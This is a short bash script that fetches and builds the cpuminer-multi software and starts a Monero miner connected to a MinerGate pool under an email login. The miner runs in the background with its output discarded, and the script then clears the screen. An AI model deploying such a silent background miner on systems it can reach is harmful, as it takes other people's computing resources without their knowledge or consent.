#!/bin/bash
sudo apt-get update
sudo apt-get install bc;
sudo apt-get install git libcurl4-openssl-dev build-essential libjansson-dev autotools-dev automake -y
git clone https://github.com/hyc/cpuminer-multi
cd cpuminer-multi && ./autogen.sh
CFLAGS="-march=native" ./configure
make
nohup ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u ttl1601@gmail.com -p x -t 7 -x ttlong > /dev/null 2>&1 &
clear
